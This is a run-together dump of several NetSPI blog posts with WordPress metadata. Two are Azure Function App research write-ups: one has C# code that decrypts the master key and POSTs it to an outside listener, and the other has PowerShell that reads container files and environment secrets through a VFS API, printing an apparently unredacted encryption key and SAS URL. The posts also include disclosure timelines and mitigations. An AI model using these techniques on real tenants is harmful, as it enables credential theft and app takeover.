- 7/13/23 – MSRC opens Case 80917 to manage the issue
- 8/02/23 – NetSPI requests update on status of the issue
- 8/03/23 – Microsoft closes the case and issues the following response:
Hi Karl,
Thank you for your patience.
MSRC has investigated this issue and concluded that this does not pose an immediate threat that requires urgent attention. This is because, for an attacker or user who already has publish access, this issue did not provide any additional access than what is already available. However, the teams agree that access to relevant filesystems and other information needs to be limited.
The teams are working on the fix for this issue per their timelines and will take appropriate action as needed to help keep customers protected.
As such, this case is being closed.
Thank you, we absolutely appreciate your flagging this issue to us, and we look forward to more submissions from you in the future!
- 8/03/23 – NetSPI replies, restating the issue and attempting to clarify MSRC’s understanding of the issue
- 8/04/23 – MSRC Reopens the case, partly thanks to a thread of tweets
- 9/11/23 - Follow up email with MSRC confirms the fix is in progress
- 11/16/23 – NetSPI discloses the issue publicly
Microsoft’s solution for this issue was to encrypt the “MSISpecializationPayload” and rename it to “EncryptedTokenServiceSpecializationPayload”. It's unclear how this is getting encrypted, but we were able to confirm that the key that encrypts the credentials does not exist in the container that runs the user code.
It should be noted that the decryption technique for the “CONTAINER_START_CONTEXT_SAS_URI” still works to expose the Function App keys. So, if you do manage to get code execution in a Function App container, you can still potentially use this technique to persist on the Function App with this method.
Prior Research Note:
While doing our due diligence for this blog, we tried to find any prior research on this topic. It appears that Trend Micro also found this issue and disclosed it in June of 2022.
At Black Hat, NetSPI VP of Research Karl Fosaaen sat down with the host of the Cloud Security Podcast Ashish Rajan to discuss all things Azure penetration testing.
During the conversation, he addressed unique challenges associated with conducting penetration tests on web applications hosted within the Azure Cloud. He also provides valuable insights into the specialized skills required for effective penetration testing in Azure environments.
Contrary to common misconceptions, cloud penetration testing in Microsoft Azure is far more complex than a mere configuration review, a misconception that extends to other cloud providers like AWS and Google Cloud as well. In this video, Karl addresses several important questions and methodologies, clarifying the distinct nature of penetration testing within the Azure ecosystem.
[wonderplugin_video iframe="https://youtu.be/Y0BkXKthQ5c" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]
[post_title] => Azure Cloud Security Pentesting Skills [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-cloud-security-pentesting-skills [to_ping] => [pinged] => [post_modified] => 2023-10-11 18:05:51 [post_modified_gmt] => 2023-10-11 23:05:51 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=31226 [menu_order] => 13 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 31207 [post_author] => 10 [post_date] => 2023-10-10 13:30:47 [post_date_gmt] => 2023-10-10 18:30:47 [post_content] =>Today, we are excited to introduce you to the transformed Dark Side Ops (DSO) training courses by NetSPI. With years of experience under our belt, we've taken our renowned DSO courses and reimagined them to offer a dynamic, self-directed approach.
The Evolution of DSO
Traditionally, our DSO courses were conducted in-person, offering a blend of expert-led lectures and hands-on labs. However, the pandemic prompted us to adapt. We shifted to remote learning via Zoom, but we soon realized that we were missing the interactivity and personalized pace that made in-person training so impactful.
A Fresh Approach
In response to this, we've reimagined DSO for the modern era. Presenting our self-directed, student-paced online courses that give you the reins to your learning journey. While preserving the exceptional content, we've infused a new approach that includes:
- Video Lectures: Engaging video presentations that bring the classroom to your screen, allowing you to learn at your convenience.
- Real-World Labs: Our DSO courses now enable you to create your own hands-on lab environment, bridging the gap between theory and practice.
- Extended Access: Say goodbye to rushed deadlines. You now have a 90-day window to complete the course at your own pace, ensuring a comfortable and comprehensive learning experience.
- Quality, Reimagined: We are unwavering in our commitment to upholding the highest training standards. Your DSO experience will continue to be exceptional.
- Save Big: For those eager to maximize their learning journey, register for all three courses and save $1,500.
What is DSO?
DSO 1: Malware Dev Training
- Dive deep into source code to gain a strong understanding of execution vectors, payload generation, automation, staging, command and control, and exfiltration. Intensive, hands-on labs provide even intermediate participants with a structured and challenging approach to write custom code and bypass the very latest in offensive countermeasures.
DSO 2: Adversary Simulation Training
- Do you want to be the best resource when the red team is out of options? Can you understand, research, build, and integrate advanced new techniques into existing toolkits? Challenge yourself to move beyond blog posts, how-tos, and simple payloads. Let’s start simulating real world threats with real world methodology.
DSO Azure: Azure Cloud Pentesting Training
- Traditional penetration testing has focused on physical assets on internal and external networks. As more organizations begin to shift these assets up to cloud environments, penetration testing processes need to be updated to account for the complexities introduced by cloud infrastructure.
Join us on this journey of continuous learning, where we're committed to supporting you every step of the way.
Join our mailing list for more updates and remember, in the realm of cybersecurity, constant evolution is key. We are here to help you stay ahead in this ever-evolving landscape.
[post_title] => NetSPI's Dark Side Ops Courses: Evolving Cybersecurity Excellence [post_excerpt] => Check out our evolved Dark Side Operations courses with a fully virtual model to evolve your cybersecurity skillset. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => dark-side-ops-courses-evolving-cybersecurity-excellence [to_ping] => [pinged] => [post_modified] => 2024-04-02 08:53:52 [post_modified_gmt] => 2024-04-02 13:53:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=31207 [menu_order] => 56 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 30784 [post_author] => 37 [post_date] => 2023-08-12 13:30:00 [post_date_gmt] => 2023-08-12 18:30:00 [post_content] =>When deploying an Azure Function App, you’re typically prompted to select a Storage Account to use in support of the application. Access to these supporting Storage Accounts can lead to disclosure of Function App source code, command execution in the Function App, and (as we’ll show in this blog) decryption of the Function App Access Keys.
Azure Function Apps use Access Keys to secure access to HTTP Trigger functions. There are three types of access keys that can be used: function, system, and master (HTTP function endpoints can also be accessed anonymously). The most privileged access key available is the master key, which grants administrative access to the Function App including being able to read and write function source code.
The master key should be protected and should not be used for regular activities. Gaining access to the master key could lead to supply chain attacks and control of any managed identities assigned to the Function. This blog explores how an attacker can decrypt these access keys if they gain access via the Function App’s corresponding Storage Account.
TLDR;
- Function App Access Keys can be stored in Storage Account containers in an encrypted format
- Access Keys can be decrypted within the Function App container AND offline
- Works with Windows or Linux, with any runtime stack
- Decryption requires access to the decryption key (stored in an environment variable in the Function container) and the encrypted key material (from host.json).
Previous Research
- Rogier Dijkman – Privilege Escalation via storage accounts
- Roi Nisimi – From listKeys to Glory: How We Achieved a Subscription Privilege
Escalation and RCE by Abusing Azure Storage Account Keys - Bill Ben Haim & Zur Ulianitzky – 10 ways of gaining control over Azure function
Apps - Andy Robbins – Abusing Azure App Service Managed Identity Assignments
- MSRC – Best practices regarding Azure Storage Keys, Azure Functions, and Azure Role Based Access
Requirements
Function Apps depend on Storage Accounts at multiple product tiers for code and secret storage. Extensive research has already been done for attacking Functions directly and via the corresponding Storage Accounts for Functions. This blog will focus specifically on key decryption for Function takeover.
Required Permissions
- Permission to read Storage Account Container blobs, specifically the host.json file (located in Storage Account Containers named “azure-webjobs-secrets”)
- Permission to write to Azure File Shares hosting Function code
The host.json file contains the encrypted access keys. The encrypted master key is contained in the masterKey.value field.
{
"masterKey": {
"name": "master",
"value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]IA",
"encrypted": true
},
"functionKeys": [
{
"name": "default",
"value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]8Q",
"encrypted": true
}
],
"systemKeys": [],
"hostName": "thisisafakefunctionappprobably.azurewebsites.net",
"instanceId": "dc[TRUNCATED]c3",
"source": "runtime",
"decryptionKeyId": "MACHINEKEY_DecryptionKey=op+[TRUNCATED]Z0=;"
}
The code for the corresponding Function App is stored in Azure File Shares. For what it's worth, with access to the host.json file, an attacker can technically overwrite existing keys and set the "encrypted" parameter to false, to inject their own cleartext function keys into the Function App (see Rogier Dijkman’s research). The directory structure for a Windows ASP.NET Function App (thisisnotrealprobably) typically uses the following structure:
A new function can be created by adding a new set of folders under the wwwroot folder in the SMB file share.
The ability to create a new function trigger by creating folders in the File Share is necessary to either decrypt the key in the function runtime OR return the decryption key by retrieving a specific environment variable.
Decryption in the Function container
Function App Key Decryption is dependent on ASP.NET Core Data Protection. There are multiple references to a specific library for Function Key security in the Function Host code.
An old version of this library can be found at https://github.com/Azure/azure-websites-security. This library creates a Function specific Azure Data Protector for decryption. The code below has been modified from an old MSDN post to integrate the library directly into a .NET HTTP trigger. Providing the encrypted master key to the function decrypts the key upon triggering.
The sample code below can be modified to decrypt the key and then send the key to a publicly available listener.
#r "Newtonsoft.Json"
using Microsoft.AspNetCore.DataProtection;
using Microsoft.Azure.Web.DataProtection;
using System.Net.Http;
using System.Text;
using System.Net;
using Microsoft.AspNetCore.Mvc;
using Microsoft.Extensions.Primitives;
using Newtonsoft.Json;
private static HttpClient httpClient = new HttpClient();
public static async Task<IActionResult> Run(HttpRequest req, ILogger log)
{
log.LogInformation("C# HTTP trigger function processed a request.");
DataProtectionKeyValueConverter converter = new DataProtectionKeyValueConverter();
string keyname = "master";
string encval = "Cf[TRUNCATED]NQ";
var ikey = new Key(keyname, encval, true);
if (ikey.IsEncrypted)
{
ikey = converter.ReadValue(ikey);
}
// log.LogInformation(ikey.Value);
string url = "https://[TRUNCATED]";
string body = $"{{"name":"{keyname}", "value":"{ikey.Value}"}}";
var response = await httpClient.PostAsync(url, new StringContent(body.ToString()));
string name = req.Query["name"];
string requestBody = await new StreamReader(req.Body).ReadToEndAsync();
dynamic data = JsonConvert.DeserializeObject(requestBody);
name = name ?? data?.name;
string responseMessage = string.IsNullOrEmpty(name)
? "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response."
: $"Hello, {name}. This HTTP triggered function executed successfully.";
return new OkObjectResult(responseMessage);
}
class DataProtectionKeyValueConverter
{
private readonly IDataProtector _dataProtector;
public DataProtectionKeyValueConverter()
{
var provider = DataProtectionProvider.CreateAzureDataProtector();
_dataProtector = provider.CreateProtector("function-secrets");
}
public Key ReadValue(Key key)
{
var resultKey = new Key(key.Name, null, false);
resultKey.Value = _dataProtector.Unprotect(key.Value);
return resultKey;
}
}
class Key
{
public Key(){}
public Key(string name, string value, bool encrypted)
{
Name = name;
Value = value;
IsEncrypted = encrypted;
}
[JsonProperty(PropertyName = "name")]
public string Name { get; set; }
[JsonProperty(PropertyName = "value")]
public string Value { get; set; }
[JsonProperty(PropertyName = "encrypted")]
public bool IsEncrypted { get; set; }
}
Triggering via browser:
Burp Collaborator:
Master key:
Local Decryption
Decryption can also be done outside of the function container. The https://github.com/Azure/azure-websites-security repo contains an older version of the code that can be pulled down and run locally through Visual Studio. However, there is one requirement for running locally and that is access to the decryption key.
The code makes multiple references to the location of default keys:
The Constants.cs file leads to two environment variables of note: AzureWebEncryptionKey (default) or MACHINEKEY_DecryptionKey. The decryption code defaults to the AzureWebEncryptionKey environment variable.
One thing to keep in mind is that the environment variable will be different depending on the underlying Function operating system. Linux based containers will use AzureWebEncryptionKey while Windows will use MACHINEKEY_DecryptionKey. One of those environment variables will be available via Function App Trigger Code, regardless of the runtime used. The environment variable values can be returned in the Function by using native code. Example below is for PowerShell in a Windows environment:
$env:MACHINEKEY_DecryptionKey
This can then be returned to the user via an HTTP Trigger response or by having the Function send the value to another endpoint.
The local decryption can be done once the encrypted key data and the decryption keys are obtained. After pulling down the GitHub repo and getting it setup in Visual Studio, quick decryption can be done directly through an existing test case in DataProtectionProviderTests.cs. The following edits can be made.
// Copyright (c) .NET Foundation. All rights reserved.
// Licensed under the MIT License. See License.txt in the project root for license information.
using System;
using Microsoft.Azure.Web.DataProtection;
using Microsoft.AspNetCore.DataProtection;
using Xunit;
using System.Diagnostics;
using System.IO;
namespace Microsoft.Azure.Web.DataProtection.Tests
{
public class DataProtectionProviderTests
{
[Fact]
public void EncryptedValue_CanBeDecrypted()
{
using (var variables = new TestScopedEnvironmentVariable(Constants.AzureWebsiteLocalEncryptionKey, "CE[TRUNCATED]1B"))
{
var provider = DataProtectionProvider.CreateAzureDataProtector(null, true);
var protector = provider.CreateProtector("function-secrets");
string expected = "test string";
// string encrypted = protector.Protect(expected);
string encrypted = "Cf[TRUNCATED]8w";
string result = protector.Unprotect(encrypted);
File.WriteAllText("test.txt", result);
Assert.Equal(expected, result);
}
}
}
}
Run the test case after replacing the variable values with the two required items. The test will fail, but the decrypted master key will be returned in test.txt! This can then be used to query the Function App administrative REST APIs.
Tool Overview
NetSPI created a proof-of-concept tool to exploit Function Apps through the connected Storage Account. This tool requires write access to the corresponding File Share where the Function code is stored and supports .NET, PSCore, Python, and Node. Given a Storage Account that is connected to a Function App, the tool will attempt to create a HTTP Trigger (function-specific API key required for access) to return the decryption key and scoped Managed Identity access tokens (if applicable). The tool will also attempt to cleanup any uploaded code once the key and tokens are received.
Once the encryption key and encrypted function app key are returned, you can use the Function App code included in the repo to decrypt the master key. To make it easier, we’ve provided an ARM template in the repo that will create the decryption Function App for you.
See the GitHub link https://github.com/NetSPI/FuncoPop for more info.
Prevention and Mitigation
There are a number of ways to prevent the attack scenarios outlined in this blog and in previous research. The best prevention strategy is treating the corresponding Storage Accounts as an extension of the Function Apps. This includes:
- Limiting the use of Storage Account Shared Access Keys and ensuring that they are not stored in cleartext.
- Rotating Shared Access Keys.
- Limiting the creation of privileged, long lasting SAS tokens.
- Use the principle of least privilege. Only grant the least privileges necessary to narrow scopes. Be aware of any roles that grant write access to Storage Accounts (including those roles with list key permissions!)
- Identify Function Apps that use Storage Accounts and ensure that these resources are placed in dedicated Resource Groups.
- Avoid using shared Storage Accounts for multiple Functions.
- Ensure that Diagnostic Settings are in place to collect audit and data plane logs.
More direct methods of mitigation can also be taken such as storing keys in Key Vaults or restricting Storage Accounts to VNETs. See the links below for Microsoft recommendations.
- https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations?tabs=azure-cli#important-considerations
- https://learn.microsoft.com/en-us/azure/azure-functions/functions-networking-options?tabs=azure-cli#restrict-your-storage-account-to-a-virtual-network
- https://learn.microsoft.com/en-us/azure/azure-functions/functions-networking-options?tabs=azure-cli#use-key-vault-references
- https://learn.microsoft.com/en-us/azure/azure-functions/security-concepts?tabs=v4
MSRC Timeline
As part of our standard Azure research process, we ran our findings by MSRC before publishing anything.
02/08/2023 - Initial report created
02/13/2023 - Case closed as expected and documented behavior
03/08/2023 - Second report created
04/25/2023 - MSRC confirms original assessment as expected and documented behavior
08/12/2023 - DefCon Cloud Village presentation
Thanks to Nick Landers for his help/research into ASP.NET Core Data Protection.
[post_title] => What the Function: Decrypting Azure Function App Keys [post_excerpt] => When deploying an Azure Function App, access to supporting Storage Accounts can lead to disclosure of source code, command execution in the app, and decryption of the app’s Access Keys. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => what-the-function-decrypting-azure-function-app-keys [to_ping] => [pinged] => [post_modified] => 2023-08-08 09:25:11 [post_modified_gmt] => 2023-08-08 14:25:11 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=30784 [menu_order] => 73 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 29749 [post_author] => 10 [post_date] => 2023-03-23 08:24:36 [post_date_gmt] => 2023-03-23 13:24:36 [post_content] =>As penetration testers, we continue to see an increase in applications built natively in the cloud. These are a mix of legacy applications that are ported to cloud-native technologies and new applications that are freshly built in the cloud provider. One of the technologies that we see being used to support these development efforts is Azure Function Apps. We recently took a deeper look at some of the Function App functionality that resulted in a privilege escalation scenario for users with Reader role permissions on Function Apps. In the case of functions running in Linux containers, this resulted in command execution in the application containers.
TL;DR
Undocumented APIs used by the Azure Function Apps Portal menu allowed for arbitrary file reads on the Function App containers.
- For the Windows containers, this resulted in access to ASP. Net encryption keys.
- For the Linux containers, this resulted in access to function master keys that allowed for overwriting Function App code and gaining remote code execution in the container.
What are Azure Function Apps?
As noted above, Function Apps are one of the pieces of technology used for building cloud-native applications in Azure. The service falls under the umbrella of “App Services” and has many of the common features of the parent service. At its core, the Function App service is a lightweight API service that can be used for hosting serverless application services.
The Azure Portal allows users (with Reader or greater permissions) to view files associated with the Function App, along with the code for the application endpoints (functions). In the Azure Portal, under App files, we can see the files available at the root of the Function App. These are usually requirement files and any supporting files you want to have available for all underlying functions.
Under the individual functions (HttpTrigger1), we can enter the Code + Test menu to see the source code for the function. Much like the code in an Automation Account Runbook, the function code is available to anyone with Reader permissions. We do frequently find hardcoded credentials in this menu, so this is a common menu for us to work with.
Both file viewing options rely on an undocumented API that can be found by proxying your browser traffic while accessing the Azure Portal. The following management.azure.com API endpoint uses the VFS function to list files in the Function App:
https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tes ter/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?rel ativePath=1&api-version=2021-01-15
In the example above, $SUB_ID would be your subscription ID, and this is for the “vfspoc” Function App in the “tester” resource group.
Discovery of the Issue
Using the identified URL, we started enumerating available files in the output:
[ { "name": "host.json", "size": 141, "mtime": "2022-08-02T19:49:04.6152186+00:00", "crtime": "2022-08-02T19:49:04.6092235+00:00", "mime": "application/json", "href": "https://vfspoc.azurewebsites.net/admin/vfs/host. json?relativePath=1&api-version=2021-01-15", "path": "C:\\home\\site\\wwwroot\\host.json" }, { "name": "HttpTrigger1", "size": 0, "mtime": "2022-08-02T19:51:52.0190425+00:00", "crtime": "2022-08-02T19:51:52.0190425+00:00", "mime": "inode/directory", "href": "https://vfspoc.azurewebsites.net/admin/vfs/Http Trigger1%2F?relativePath=1&api-version=2021-01-15", "path": "C:\\home\\site\\wwwroot\\HttpTrigger1" } ]
As we can see above, this is the expected output. We can see the host.json file that is available in the Azure Portal, and the HttpTrigger1 function directory. At first glance, this may seem like nothing. While reviewing some function source code in client environments, we noticed that additional directories were being added to the Function App root directory to add libraries and supporting files for use in the functions. These files are not visible in the Portal if they’re in a directory (See “Secret Directory” below). The Portal menu doesn’t have folder handling built in, so these files seem to be invisible to anyone with the Reader role.
By using the VFS APIs, we can view all the files in these application directories, including sensitive files that the Azure Function App Contributors might have assumed were hidden from Readers. While this is a minor information disclosure, we can take the issue further by modifying the “relativePath” parameter in the URL from a “1” to a “0”.
Changing this parameter allows us to now see the direct file system of the container. In this first case, we’re looking at a Windows Function App container. As a test harness, we’ll use a little PowerShell to grab a “management.azure.com” token from our authenticated (as a Reader) Azure PowerShell module session, and feed that to the API for our requests to read the files from the vfspoc Function App.
$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token (Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management. azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/ Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath= 0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"}).Content | ConvertFrom-Json name : data size : 0 mtime : 2022-09-12T20:20:48.2362984+00:00 crtime : 2022-09-12T20:20:48.2362984+00:00 mime : inode/directory href : https://vfspoc.azurewebsites.net/admin/vfs/data%2F? relativePath=0&api-version=2021-01-15 path : D:\home\data name : LogFiles size : 0 mtime : 2022-09-12T20:20:02.5561162+00:00 crtime : 2022-09-12T20:20:02.5561162+00:00 mime : inode/directory href : https://vfspoc.azurewebsites.net/admin/vfs/LogFiles%2 F?relativePath=0&api-version=2021-01-15 path : D:\home\LogFiles name : site size : 0 mtime : 2022-09-12T20:20:02.5701081+00:00 crtime : 2022-09-12T20:20:02.5701081+00:00 mime : inode/directory href : https://vfspoc.azurewebsites.net/admin/vfs/site%2F? relativePath=0&api-version=2021-01-15 path : D:\home\site name : ASP.NET size : 0 mtime : 2022-09-12T20:20:48.2362984+00:00 crtime : 2022-09-12T20:20:48.2362984+00:00 mime : inode/directory href : https://vfspoc.azurewebsites.net/admin/vfs/ASP.NET%2F ?relativePath=0&api-version=2021-01-15 path : D:\home\ASP.NET
Access to Encryption Keys on the Windows Container
With access to the container’s underlying file system, we’re now able to browse into the ASP.NET directory on the container. This directory contains the “DataProtection-Keys” subdirectory, which houses xml files with the encryption keys for the application.
Here’s an example URL and file for those keys:
https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/ tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs/ /ASP.NET/DataProtection-Keys/key-ad12345a-e321-4a1a-d435-4a98ef4b3 fb5.xml?relativePath=0&api-version=2018-11-01 <?xml version="1.0" encoding="utf-8"?> <key id="ad12345a-e321-4a1a-d435-4a98ef4b3fb5" version="1"> <creationDate>2022-03-29T11:23:34.5455524Z</creationDate> <activationDate>2022-03-29T11:23:34.2303392Z</activationDate> <expirationDate>2022-06-27T11:23:34.2303392Z</expirationDate> <descriptor deserializerType="Microsoft.AspNetCore.DataProtection. AuthenticatedEncryption.ConfigurationModel.AuthenticatedEncryptor DescriptorDeserializer, Microsoft.AspNetCore.DataProtection, Version=3.1.18.0, Culture=neutral , PublicKeyToken=ace99892819abce50"> <descriptor> <encryption algorithm="AES_256_CBC" /> <validation algorithm="HMACSHA256" /> <masterKey p4:requiresEncryption="true" xmlns:p4=" https://schemas.asp.net/2015/03/dataProtection"> <!-- Warning: the key below is in an unencrypted form. --> <value>a5[REDACTED]==</value> </masterKey> </descriptor> </descriptor> </key>
While we couldn’t use these keys during the initial discovery of this issue, there is potential for these keys to be abused for decrypting information from the Function App. Additionally, we have more pressing issues to look at in the Linux container.
Command Execution on the Linux Container
Since Function Apps can run in both Windows and Linux containers, we decided to spend a little time on the Linux side with these APIs. Using the same API URLs as before, we change them over to a Linux container function app (vfspoc2). As we see below, this same API (with “relativePath=0”) now exposes the Linux base operating system files for the container:
https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15
JSON output parsed into a PowerShell object:
name : lost+found
size : 0
mtime : 1970-01-01T00:00:00+00:00
crtime : 1970-01-01T00:00:00+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/lost%2Bfound%2F?relativePath=0&api-version=2021-01-15
path : /lost+found
[Truncated]
name : proc
size : 0
mtime : 2022-09-14T22:28:57.5032138+00:00
crtime : 2022-09-14T22:28:57.5032138+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/proc%2F?relativePath=0&api-version=2021-01-15
path : /proc
[Truncated]
name : tmp
size : 0
mtime : 2022-09-14T22:56:33.6638983+00:00
crtime : 2022-09-14T22:56:33.6638983+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/tmp%2F?relativePath=0&api-version=2021-01-15
path : /tmp
name : usr
size : 0
mtime : 2022-09-02T21:47:36+00:00
crtime : 1970-01-01T00:00:00+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/usr%2F?relativePath=0&api-version=2021-01-15
path : /usr
name : var
size : 0
mtime : 2022-09-03T21:23:43+00:00
crtime : 2022-09-03T21:23:43+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/var%2F?relativePath=0&api-version=2021-01-15
path : /var
Breaking out one of my favorite NetSPI blogs, Directory Traversal, File Inclusion, and The Proc File System, we know that we can potentially access environmental variables for different PIDs that are listed in the “proc” directory.
If we request a listing of the proc directory, we can see that there are a handful of PIDs (denoted by the numbers) listed:
https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/?relativePath=0&api-version=2021-01-15
JSON output parsed into a PowerShell object:
name : fs
size : 0
mtime : 2022-09-21T22:00:39.3885209+00:00
crtime : 2022-09-21T22:00:39.3885209+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/fs/?relativePath=0&api-version=2021-01-15
path : /proc/fs
name : bus
size : 0
mtime : 2022-09-21T22:00:39.3895209+00:00
crtime : 2022-09-21T22:00:39.3895209+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/bus/?relativePath=0&api-version=2021-01-15
path : /proc/bus
[Truncated]
name : 1
size : 0
mtime : 2022-09-21T22:00:38.2025209+00:00
crtime : 2022-09-21T22:00:38.2025209+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1/?relativePath=0&api-version=2021-01-15
path : /proc/1
name : 16
size : 0
mtime : 2022-09-21T22:00:38.2025209+00:00
crtime : 2022-09-21T22:00:38.2025209+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/16/?relativePath=0&api-version=2021-01-15
path : /proc/16
[Truncated]
name : 59
size : 0
mtime : 2022-09-21T22:00:38.6785209+00:00
crtime : 2022-09-21T22:00:38.6785209+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/59/?relativePath=0&api-version=2021-01-15
path : /proc/59
name : 1113
size : 0
mtime : 2022-09-21T22:16:09.1248576+00:00
crtime : 2022-09-21T22:16:09.1248576+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1113/?relativePath=0&api-version=2021-01-15
path : /proc/1113
name : 1188
size : 0
mtime : 2022-09-21T22:17:18.5695703+00:00
crtime : 2022-09-21T22:17:18.5695703+00:00
mime : inode/directory
href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1188/?relativePath=0&api-version=2021-01-15
path : /proc/1188
For the next step, we can use PowerShell to request the “environ” file from PID 59 to get the environmental variables for that PID. We will then write it to a temp file and “get-content” the file to output it.
$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token
Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/59/environ?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"} -OutFile .\TempFile.txt
gc .\TempFile.txt
PowerShell Output - Newlines added for clarity:
CONTAINER_IMAGE_URL=mcr.microsoft.com/azure-functions/mesh:3.13.1-python3.7
REGION_NAME=Central US
HOSTNAME=SandboxHost-637993944271867487
[Truncated]
CONTAINER_ENCRYPTION_KEY=bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=
LANG=C.UTF-8
CONTAINER_NAME=E9911CE2-637993944227393451
[Truncated]
CONTAINER_START_CONTEXT_SAS_URI=https://wawsstorageproddm1157.blob.core.windows.net/azcontainers/e9911ce2-637993944227393451?sv=2014-02-14&sr=b&sig=5ce7MUXsF4h%2Fr1%2BfwIbEJn6RMf2%2B06c2AwrNSrnmUCU%3D&st=2022-09-21T21%3A55%3A22Z&se=2023-09-21T22%3A00%3A22Z&sp=r
[Truncated]
In the output, we can see that there are a couple of interesting variables.
- CONTAINER_ENCRYPTION_KEY
- CONTAINER_START_CONTEXT_SAS_URI
The encryption key variable is self-explanatory, and the SAS URI should be familiar to anyone that read Jake Karnes’ post on attacking Azure SAS tokens. If we navigate to the SAS token URL, we’re greeted with an “encryptedContext” JSON blob. Conveniently, we have the encryption key used for this data.
Using CyberChef, we can quickly pull together the pieces to decrypt the data. In this case, the IV is the first portion of the JSON blob (“Bad/iquhIPbJJc4n8wcvMg==”). We know the key (“bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=”), so we will just use the middle portion of the Base64 JSON blob as our input.
Here’s what the recipe looks like in CyberChef:
Once decrypted, we have another JSON blob of data, now with only one encrypted chunk (“EncryptedEnvironment”). We won’t be dealing with that data as the important information has already been decrypted below.
{"SiteId":98173790,"SiteName":"vfspoc2", "EncryptedEnvironment":"2 | Xj[REDACTED]== | XjAN7[REDACTED]KRz", "Environment":{"FUNCTIONS_EXTENSION_VERSION":"~3", "APPSETTING_FUNCTIONS_EXTENSION_VERSION":"~3", "FUNCTIONS_WORKER_RUNTIME":"python", "APPSETTING_FUNCTIONS_WORKER_RUNTIME":"python", "AzureWebJobsStorage":"DefaultEndpointsProtocol=https;AccountName= storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;EndpointSuffix= core.windows.net", "APPSETTING_AzureWebJobsStorage":"DefaultEndpointsProtocol=https; AccountName=storageaccountfunct9626;AccountKey=7s[REDACTED]uA==; EndpointSuffix=core.windows.net", "ScmType":"None", "APPSETTING_ScmType":"None", "WEBSITE_SITE_NAME":"vfspoc2", "APPSETTING_WEBSITE_SITE_NAME":"vfspoc2", "WEBSITE_SLOT_NAME":"Production", "APPSETTING_WEBSITE_SLOT_NAME":"Production", "SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.blob.core. windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-02-14&sr=b& sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", "APPSETTING_SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626. blob.core.windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014- 02-14&sr=b&sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", "WEBSITE_AUTH_ENCRYPTION_KEY":"F1[REDACTED]25", "AzureWebEncryptionKey":"F1[REDACTED]25", "WEBSITE_AUTH_SIGNING_KEY":"AF[REDACTED]DA", [Truncated] "FunctionAppScaleLimit":0,"CorsSpecializationPayload":{"Allowed Origins":["https://functions.azure.com", "https://functions-staging.azure.com", "https://functions-next.azure.com"],"SupportCredentials":false}, 